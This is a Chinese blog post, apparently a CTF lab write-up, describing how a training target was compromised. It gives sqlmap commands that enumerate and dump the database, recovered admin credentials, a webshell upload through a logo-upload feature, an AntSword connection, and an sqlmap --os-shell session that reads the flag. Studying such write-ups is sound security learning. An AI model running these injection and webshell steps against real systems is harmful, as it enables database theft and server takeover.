CTF实例题

最新推荐文章于 2024-05-09 15:55:57 发布
最新推荐文章于 2024-05-09 15:55:57 发布
阅读量1.2k 收藏
点赞数
文章标签: linux php python mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A1956936030/article/details/108649787
版权

1.靶机目标 http://117.167.136.244:28057
在这里插入图片描述
2.靶机为post请求即用burpsuite抓包
打开burpsuite
在这里插入图片描述
3.用burpsuite对靶机进行抓包
找到购买卡密
在这里插入图片描述
进行购买卡密
在这里插入图片描述
打开intercept
在这里插入图片描述
抓包成功

在这里插入图片描述
找到注入点如下http://117.167.136.244:28057/ajax.php?act=selgo
在这里插入图片描述

4.用sqlmap注入
(1)找库:sqlmap -u “http://117.167.136.244:28057/ajax.php?act=selgo” --data “tyid=1” --dbs
在这里插入图片描述
(2)找表sqlmap -u “http://117.167.136.244:28057/ajax.php?act=selgo” --data “tyid=1” -D faka --tables
在这里插入图片描述
(3)提示要在此"D:\Program Files\Python38\sqlmap\data\txt\common-columns.txt"路径下加上ayangw_k和ayangw_v字段
如下图
在这里插入图片描述
提示如下
在这里插入图片描述
加载如下即可结束
在这里插入图片描述

(4)sqlmap -u “http://117.167.136.244:28057/ajax.php?act=selgo” --data “tyid=1” -D faka -T ayangw_config --dump
成功找到后台密码pwd
在这里插入图片描述
用户名和密码如下:
admin :admin
pwd :MTIzNDU2

5.找到后台入口
由此进入:http://117.167.136.244:28057/admin/
在系统设置中首页LOGO配置中找到上传点
在这里插入图片描述

上传shell.php文件
找到文件存储位置
在这里插入图片描述
图片地址如图文件上传地址可能在logo.php文件
在这里插入图片描述
显示成功
在这里插入图片描述
6.用蚁剑连接http://117.167.136.244:28057/assets/imgs/logo.php
在这里插入图片描述
找到flag.sh
在这里插入图片描述
flag.sh提示在 /home/flag 中
在这里插入图片描述

成功找到flag
在这里插入图片描述
7.还可用shell找到flag
sqlmap -u “http://117.167.136.244:28057/ajax.php?act=selgo” --data “tyid=1” --os-shel
成功os-shell>
在这里插入图片描述
列表如下:
在这里插入图片描述列根目录如下ls /
在这里插入图片描述
发现flag.sh
ls /flag.sh
提示flag在/home/flag中
ls /home后找到flag
在这里插入图片描述
cat /home/flag后找到flag{64f0d856-62e5-457c-8601-2c5ff11295b2}
在这里插入图片描述

哇哇**
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CTF web学习笔记
daqiangdetianxia的博客
06-30 1731
web狗生存之道 讲师:y4ngshu 日常渗透测试(笔记) 1.信息收集 2.登陆后台----->getshell 3.Getshell失败----->转换思路------>挖掘其它漏洞(sql注入等)------>列库收集用户信息 4.拿到用户密码------>撞邮箱-------->邮箱拿到关键信息----------->拿到vpn 5.通过vpn去访问文件服务器------->写脚本getshell CTF学习 1.xss打后台-----&gt.
CTF实战
qq_44720671的博客
11-10 3020
由于i春秋上没有crypto方向的,我在攻防世界上解了几道。 一、你和小鱼终于走到了最后的一个谜所在的地方,上面写着一段话“亲爱的朋友, 很开心你对网络安全有这么大的兴趣,希望你一直坚持下去,不要放弃 ,学到一些知识, 走进广阔的安全大世界”,你和小鱼接过谜,开始了耐心细致的解答。flag为cyberpeace{你解答出的八位大写字母} 附件:884210122048022440401422...
CTF.zip(内有解思路)
05-09
共选入了 17道 试,适合动手练习(内有解思路)
内网渗透代理知识以及渗透某CTF三层靶机实例
m0_58595840的博客
01-04 1952
内网代理技术拿下某CTF三层靶机渗透
网络安全最全100道CTF目,收好了~(附答案)_ctf选择(1),2024网络安全大厂面试经验
最新发布
2401_84300239的博客
05-09 720
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
什么是ajax跨域,如何解决
weixin_44274975的博客
03-25 124
http://192.168.1.100:8000 http://192.168.1.100:8001 在搜狐的网页不能请求新浪, 如何解决:客户端解决,使用jsonp格式 服务器端解决这个:
CTF
m0_68052766的博客
11-12 462
来自一名CTF新手小白,也是跟着教程慢慢做慢慢学。
CTF100.docx
05-25
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符...
CTF库超详细资源合集
06-14
在传统的CTF线上⽐赛中,Web类⽬是主要的型之⼀,相较于⼆进制、逆向等类型的⽬,参赛者不需掌握系统底层知识;相较于密码学、杂项问,不需具特别强的编程能⼒,故⼊门较为容易。Web类⽬常见的漏洞类型...
CTF 实战选择
02-28
CTF 实战 选择,带答案 编辑版
CTF 隐写术经典例讲解
10-22
该内容为CTF隐写术经理例讲解,包含图片隐写,流量分析,文件查看,文件分离,加密解密等多种型讲解,图文结合,适合新手学习。
Imaginary CTF 2022 真
08-01
"Imaginary CTF 2022 真"是网络安全竞赛中的一种挑战集,这类活动通常由各种组织举办,旨在检验参赛者在逆向工程、取证分析、网络攻防、密码学以及杂项技能等多个IT领域的知识和能力。 Imaginary CTF 平台...
2021 N1CTF CTF.zip
12-07
2021 N1CTF CTF
CTF
qq_63489512的博客
05-21 1567
第一次参加类似于ctf的比赛赛前准备,以及赛后对目的总结
CTF | CTF比赛解分享
hackzkaq的博客
10-09 7269
前言:由于此次比赛的目较多,所以这是这个比赛的第一篇wp,共20,先记录一下,防止忘记。里面有些目是新手较为简单,但也有许多有意思的目,真的是做的过程痛不欲生,做完才感觉到酣畅淋漓,废话不多说,开写。接下来就可以定位了。1.这次显示文件是个jpg格式的图片,但是打不开,16进制编辑器打开,看到文件头出现了IHDR头,就可以想到其实是个png格式的图片,再看到文件尾,更加证实了是个png文件。4.第三张照片是最头疼的,全都是高楼,能够看到的只有广西农信,时代丽都,搜索相关位置,找到了大概区域。
CTF合集(1)
weixin_51339377的博客
08-25 6350
判断出来闭合是单引号 接下来构造完整的闭合语句 发现回显正常 说明闭合差不多成功!可以使用and 1=1 和and 1=2进行控制性测试 这里不演示。1.用burp抓包登录进入,任意输入账号(除了admin)和密码即可,注意网页对admin账户最开始做了限制,所以admin是没办法登录进去的。(修改账号提交): nctf.nuptzj.cn/web13/index.php?状态码200表示请求成功 状态码401表示未授权访问 也就是登录失败。说明有3列在这个数据库中 接下来可以开始进行数据库的注入操作。.
CTF-网安实验室(基础关)
道阻且长,行则将至。
09-07 2010
Base64 编码 什么是Base64编码? 在参数传输的过程中经常遇到的一种情况:使用全英文的没问,但一旦涉及到中文就会出现乱码情况。与此类似,网络上传输的字符并不全是可打印的字符,比如二进制文件、图片等。Base64的出现就是为了解决此问,它是基于64个可打印的字符来表示二进制的数据的一种方法。 Base64,就是使用64个可打印字符来表示二进制数据的方法。Base64的索引与对应字符的关...
CTF目合集_网络安全ctf大赛库,附详细答案
碧海朝天素
04-08 1714
/对字符串进行反转 如果是abc 那么就是 cba。X-Forwarded-For 尝试这个。将1改成2即可绕过wakeup功能。
ctf理论库及答案
09-07
CTF(Capture The Flag)是一种网络安全竞赛形式,参赛者需要在规定时间内解决一系列与网络安全相关的目,其中包括理论CTF理论库及答案是指整理和收集的一套关于CTF理论知识的目和对应的答案。这些理论...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值